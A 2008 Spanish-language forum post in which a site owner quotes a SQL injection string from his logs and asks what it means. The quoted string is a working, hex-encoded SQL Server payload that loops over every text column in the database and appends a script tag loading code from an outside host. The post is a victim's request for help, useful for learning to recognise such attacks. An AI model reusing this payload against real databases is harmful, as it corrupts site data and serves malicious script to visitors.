Ver Mensaje Individual
  #1 (permalink)  
Antiguo 17/07/2008, 08:25
kid
 
Fecha de Ingreso: diciembre-2003
Mensajes: 295
Antigüedad: 20 años, 4 meses
Puntos: 0
Que significa esto?

Hace unos días revisando los log de mi sitios aparecio esto despues de una variable pasada por GET, por ende, fue un intento de SQL Injection.

¿Que significa esa cadena?

Cita:
DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x44

45434C415245204054205641524348415228323535292C4043 20564152434841522832353529204445434C41524520546162 6C655F437572736F7220435552534F5220464F522

053454C45435420612E6E616D652C622E6E616D652046524F4 D207379736F626A6563747320612C737973636F6C756D6E732 06220574845524520612E69643D622E696420414E

4420612E78747970653D27752720414E442028622E78747970 653D3939204F5220622E78747970653D3335204F5220622E78 747970653D323331204F5220622E78747970653D3

1363729204F50454E205461626C655F437572736F722046455 44348204E4558542046524F4D205461626C655F437572736F7 220494E544F2040542C4043205748494C45284040

46455443485F5354415455533D302920424547494E20455845 432827555044415445205B272B40542B275D20534554205B27 2B40432B275D3D525452494D28434F4E564552542

8564152434841522834303030292C5B272B40432B275D29292 B27273C736372697074207372633D687474703A2F2F7777772 E626B706164642E6D6F62692F6E67672E6A733E3C

2F7363726970743E27272729204645544348204E4558542046 524F4D205461626C655F437572736F7220494E544F2040542C 404320454E4420434C4F5345205461626C655F437

572736F72204445414C4C4F43415445205461626C655F43757 2736F7220%20AS%20VARCHAR(4000));EXEC(@S);--
Gracias!